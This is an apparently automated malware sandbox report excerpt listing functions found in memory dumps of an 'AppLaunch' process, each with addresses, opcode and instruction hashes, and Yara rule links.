                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: f3303e03ae43b876e49f506ba034e10e11a9612065c10dd97fd287dbf060fe64
                                                                                                                                                                          • Instruction ID: 200a5d62de1123a660e998b25e0612056d72863fbb7a79ea98819be80d125aed
                                                                                                                                                                          • Opcode Fuzzy Hash: f3303e03ae43b876e49f506ba034e10e11a9612065c10dd97fd287dbf060fe64
                                                                                                                                                                          • Instruction Fuzzy Hash: A7F08C71A141188BDF08CEA9D94A7DDFBB4EB89315F00907AE40177680DB769985CBA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A31AD67 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 45fac34e958d1035238f8825a0ca7643a258e85d6de05e819266643960eb3608
                                                                                                                                                                          • Instruction ID: 6b2a86a73c905af74bad97a9bb3e7931de399f5e4ad81a27890529a9af00a427
                                                                                                                                                                          • Opcode Fuzzy Hash: 45fac34e958d1035238f8825a0ca7643a258e85d6de05e819266643960eb3608
                                                                                                                                                                          • Instruction Fuzzy Hash: FE01A275D1A3888FCB25CBE0E9651DDBFB0AB4E257F14019BD445A7291C7358A04CF61
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A3169A0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b42a0322529c4c4e40ad4d0c269b2b392a6f4d5aaf7c4aed5970c10f99941be1
                                                                                                                                                                          • Instruction ID: 357309dc1db6cdc99111b938fd708960233ea5ed3250fb305af24bbeca886a8c
                                                                                                                                                                          • Opcode Fuzzy Hash: b42a0322529c4c4e40ad4d0c269b2b392a6f4d5aaf7c4aed5970c10f99941be1
                                                                                                                                                                          • Instruction Fuzzy Hash: A8015634E041588BDF09CFA5E4556DCBFF5EB8E311F0480AAE445B3241DB364844CBA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A318AE1 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 70192f2f02b0edb67823a3745418e4ab1f68ca2ec4d0880b41f818f950e935ad
                                                                                                                                                                          • Instruction ID: 7e5dbaf58b6b1c97fb9e1d665ee94634f0e2b8a320d54aa07ec92d5cdcf1d051
                                                                                                                                                                          • Opcode Fuzzy Hash: 70192f2f02b0edb67823a3745418e4ab1f68ca2ec4d0880b41f818f950e935ad
                                                                                                                                                                          • Instruction Fuzzy Hash: B6017874E051188BCF08CBA8E9592ECBFB1AF4C315F18906AD405B7651C7355844CBA9
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09CCFCD8 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.374772188.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9cc0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 5920cdbf1c596c88de81af73d9554ff60bb3ce83096c0bcb01a56a035b294177
                                                                                                                                                                          • Instruction ID: b23a5561601a73bc6c108d33c19af40c469cdd6f989275165bbfc1c695a20945
                                                                                                                                                                          • Opcode Fuzzy Hash: 5920cdbf1c596c88de81af73d9554ff60bb3ce83096c0bcb01a56a035b294177
                                                                                                                                                                          • Instruction Fuzzy Hash: 79F0C23274C20A9B8A04A725E08887D379BEFC01283554C2CE15ADB260DF61AC0B43EB
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09CCFCD7 Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.374772188.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9cc0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ccd9b523325b01f4092e3ea7fa7fecc6571d540e6c612e5481cc5a89f06c4eff
                                                                                                                                                                          • Instruction ID: caa7357262be77015ee209d2b2ce3fd5de6835b903c488cce32fc3f9ed893a90
                                                                                                                                                                          • Opcode Fuzzy Hash: ccd9b523325b01f4092e3ea7fa7fecc6571d540e6c612e5481cc5a89f06c4eff
                                                                                                                                                                          • Instruction Fuzzy Hash: 75F0C23274C20A9B8A44A724F0888BD379BEFD01283158D2CE15ADB260CF616C0B47EB
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09CCF2D0 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.374772188.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9cc0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: d2c4351e873c7f56d2ceebe923400d9742dbf63f7ac6a3ac594740f7aa49c385
                                                                                                                                                                          • Instruction ID: 113561bf602e4f97c82ab179551d1fb92d11538b09c0441c2e8d44fa0a9e7ada
                                                                                                                                                                          • Opcode Fuzzy Hash: d2c4351e873c7f56d2ceebe923400d9742dbf63f7ac6a3ac594740f7aa49c385
                                                                                                                                                                          • Instruction Fuzzy Hash: 80F05832744014ABC7009A0AF888A9EBBAEFBC9261B548027F949C7344CB319D02CBA1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 051BD040 Relevance: .0, Instructions: 36COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.356195144.00000000051BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 051BD000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_51bd000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 42767c81b82b503f1d38c85f1c001c22174c1c115a0e44cefe388d4d732b3031
                                                                                                                                                                          • Instruction ID: 52db64b15586a7aacc3ce72b9443353679eac15b7cdfaf2dcc261744cca79a8e
                                                                                                                                                                          • Opcode Fuzzy Hash: 42767c81b82b503f1d38c85f1c001c22174c1c115a0e44cefe388d4d732b3031
                                                                                                                                                                          • Instruction Fuzzy Hash: 84F0C2714083849EE7148A16DC84BA2FFA8EB81374F18C05AED085F686C3B99844CBB1
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09CCF547 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.374772188.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9cc0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 51810e3fddd99c7d24f3ebf322172f9a4a4d4dc17f900f43522003b9751459e5
                                                                                                                                                                          • Instruction ID: c01b78d1dfbc3f4025b752ffed50ea391d31ebaf645dcc939fa1a4cf46b118de
                                                                                                                                                                          • Opcode Fuzzy Hash: 51810e3fddd99c7d24f3ebf322172f9a4a4d4dc17f900f43522003b9751459e5
                                                                                                                                                                          • Instruction Fuzzy Hash: E7F062716483859FD716CF65D4046A5BFE2FF46364B0580ACE445CF251D735E842CB62
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09CCF4EF Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.374772188.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9cc0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a2b959c609481df532606551fcf80a2a9a597d1efd1e26bb9512c56836dd02ea
                                                                                                                                                                          • Instruction ID: 05651e5c55d1918b4057c00304440ee48b914cb5e74ab381d2ea8d88751aa547
                                                                                                                                                                          • Opcode Fuzzy Hash: a2b959c609481df532606551fcf80a2a9a597d1efd1e26bb9512c56836dd02ea
                                                                                                                                                                          • Instruction Fuzzy Hash: 04F0FFB2E00218AFCB55DF999804AFEBBFAFFC8311F14812AE515E2250D7744A158B90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09CCF4F0 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.374772188.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9cc0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 8161aebca898806161fd194b918c933577983c0777b30f7c864613af8ff5fd4d
                                                                                                                                                                          • Instruction ID: e6ca2371b448f9cc2f899d8c7adb9f8bd2ed5a848f5818e6ce670b9f0c7c72b4
                                                                                                                                                                          • Opcode Fuzzy Hash: 8161aebca898806161fd194b918c933577983c0777b30f7c864613af8ff5fd4d
                                                                                                                                                                          • Instruction Fuzzy Hash: 1BF012B2E0021CAFCB55DF999C04AEEBBFAFFCC611F148026E615E3240D7745A158B90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A31B418 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: b089263b3c5c1e22dceaccb136c8a3cef477c03ad3960bb020339f34fe31ae82
                                                                                                                                                                          • Instruction ID: c4b4a118ce35c91f08df851252fd0f14211e681e0fa83e198239b12347ced605
                                                                                                                                                                          • Opcode Fuzzy Hash: b089263b3c5c1e22dceaccb136c8a3cef477c03ad3960bb020339f34fe31ae82
                                                                                                                                                                          • Instruction Fuzzy Hash: D2F06731A141188BDF08CEA9E90A7DDBBB9EB89315F00903AD405B7280DB759984CBA4
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09CCF0CF Relevance: .0, Instructions: 30COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.374772188.0000000009CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09CC0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9cc0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: ab6241c0f8776af777b5a48a2b084d650a4bdd2ac70d6825c0f03b35e4a6876e
                                                                                                                                                                          • Instruction ID: c4d7726f9cab2594a86eec44ce2ac05b52b7df86a3ae68efb7aac8fad34ee4e7
                                                                                                                                                                          • Opcode Fuzzy Hash: ab6241c0f8776af777b5a48a2b084d650a4bdd2ac70d6825c0f03b35e4a6876e
                                                                                                                                                                          • Instruction Fuzzy Hash: A3E06572B043195F47548A58B8449BF7BEAEBC8224314852EE119D3200CB315C014B50
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A316891 Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: a731ef79e759a364ca2b44998fbb151fc71cbf52bc557ae2e9cfe0bf759f88cc
                                                                                                                                                                          • Instruction ID: db1f1453358c77a3e54706811a4a18711a6a4a8d73e3265d88a3f4677d5d0ad0
                                                                                                                                                                          • Opcode Fuzzy Hash: a731ef79e759a364ca2b44998fbb151fc71cbf52bc557ae2e9cfe0bf759f88cc
                                                                                                                                                                          • Instruction Fuzzy Hash: 0AF06570806219CFDB38DFA0C99A7ADB775FB06305F101899C00AB2680CF754E84CF54
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                          Function 0A312440 Relevance: 5.4, Strings: 4, Instructions: 350COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: 8^Ol$8^Ol$| $|
                                                                                                                                                                          • API String ID: 0-3773463321
                                                                                                                                                                          • Opcode ID: 789c3703a433419f73c38eaabbbdf659524b0bf919d87375202af288779a6623
                                                                                                                                                                          • Instruction ID: 695db7047ce8c229c1c94af1db25b703ca0baea97fedb7634d8acdb2f4c0abe1
                                                                                                                                                                          • Opcode Fuzzy Hash: 789c3703a433419f73c38eaabbbdf659524b0bf919d87375202af288779a6623
                                                                                                                                                                          • Instruction Fuzzy Hash: A1F1C174A012288FDB68DF64D890BDEB7B2BF89304F1180E9C54AA7751DB31AE85CF51
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A314962 Relevance: .5, Instructions: 500COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1ed2a02d203659c3bf63437abb46db4e18a895613e578249e2c91d2919236a32
                                                                                                                                                                          • Instruction ID: 728d0a9d11d5147ad826286949714f091fea98a96fe438bb23e9005ad51b9ad1
                                                                                                                                                                          • Opcode Fuzzy Hash: 1ed2a02d203659c3bf63437abb46db4e18a895613e578249e2c91d2919236a32
                                                                                                                                                                          • Instruction Fuzzy Hash: C232C270E05228CFDB28DF64C894BDEB7B2AF89304F1195E9C109AB651DB319E85CF91
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A312DC8 Relevance: .2, Instructions: 215COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1989a94a4da6851b1a7c6d7c48c2c7fc7a15cf357e84f811edb1c4fc338956c7
                                                                                                                                                                          • Instruction ID: fcc9d7c41a6ef2ebc44e9edde94cbe7e4df3047ea35f1b58d2d3f38da31fed52
                                                                                                                                                                          • Opcode Fuzzy Hash: 1989a94a4da6851b1a7c6d7c48c2c7fc7a15cf357e84f811edb1c4fc338956c7
                                                                                                                                                                          • Instruction Fuzzy Hash: BDA1C174E01218CFDB68DFA9C990B9DBBB2BF89304F2081A9D409AB351DB319985CF51
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A313EE0 Relevance: .2, Instructions: 181COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 0f15963e5aa10547ada1215a0e11f77938995443e97eb3e69835b9d3a7d48384
                                                                                                                                                                          • Instruction ID: 17b25b03424a9ceec1dfc2ca39295895201b70a5ca2d01f425ba4bf918d4cc65
                                                                                                                                                                          • Opcode Fuzzy Hash: 0f15963e5aa10547ada1215a0e11f77938995443e97eb3e69835b9d3a7d48384
                                                                                                                                                                          • Instruction Fuzzy Hash: 1E71DF70E01218DFDB28DFA9D484AEEBBB2FF89300F209429D815AB755DB359845CF90
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A318927 Relevance: .1, Instructions: 130COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 9bb961874b99981773cf5ef19fc65fd85e7c7b935d357b04608df19b7f2fe7c0
                                                                                                                                                                          • Instruction ID: cd26f8194cdc15b7afabd84cbf3782fd841ee6375c7c2d5da3297e22234c9d78
                                                                                                                                                                          • Opcode Fuzzy Hash: 9bb961874b99981773cf5ef19fc65fd85e7c7b935d357b04608df19b7f2fe7c0
                                                                                                                                                                          • Instruction Fuzzy Hash: DC51FF70E012488FCB18DFE5D5A4AEEBBB2BF89304F20912AD415AB790DB349906CF51
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A318930 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 6608ca70080c497288daa50e3bb35aa4d2a7112bce5241e1b2fa5ccf45feeb64
                                                                                                                                                                          • Instruction ID: dff9995a49b30d7a62fb20d21fcabc2df0c1cd01a891077e177442097ff239db
                                                                                                                                                                          • Opcode Fuzzy Hash: 6608ca70080c497288daa50e3bb35aa4d2a7112bce5241e1b2fa5ccf45feeb64
                                                                                                                                                                          • Instruction Fuzzy Hash: BC51EF70E012089FCB18DFE5D494AEEBBB2BF89304F20912AD415AB794DB359906CF51
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 0A317FE6 Relevance: .0, Instructions: 25COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.376429993.000000000A310000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A310000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_a310000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: c922cae62ed27e3318c991660075e9340173551bd82b701f5b084bccb1a1d77d
                                                                                                                                                                          • Instruction ID: d690e04b892d0aa056b91c461ae19a2670d70205111fa256e59bc5cfcf706e00
                                                                                                                                                                          • Opcode Fuzzy Hash: c922cae62ed27e3318c991660075e9340173551bd82b701f5b084bccb1a1d77d
                                                                                                                                                                          • Instruction Fuzzy Hash: 02E09270D5110EEED728CF90C441BBEF6B06B05308F205416840177A50CB3046448FA6
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                          Function 09BB16D4 Relevance: 5.2, Strings: 4, Instructions: 163COMMON
                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.373861706.0000000009BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 09BB0000, based on PE: false
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_9bb0000_AppLaunch.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: , $D $\ $|
                                                                                                                                                                          • API String ID: 0-438355218
                                                                                                                                                                          • Opcode ID: dde6a90c5fdb0ccc2ace7d734df0d9e264c9fe2702ec29b51e7a3148cbaf9dbf
                                                                                                                                                                          • Instruction ID: 595842162d789f301016b1236c8ee3e006b4464b458e94eae329c89b3419fd1f
                                                                                                                                                                          • Opcode Fuzzy Hash: dde6a90c5fdb0ccc2ace7d734df0d9e264c9fe2702ec29b51e7a3148cbaf9dbf
                                                                                                                                                                          • Instruction Fuzzy Hash: 7C51C3783082055FD7009A6988A5FBA76AAEF89714F1584A9E7028F3E6CFF4DC418752
                                                                                                                                                                          Uniqueness

                                                                                                                                                                          Uniqueness Score: -1.00%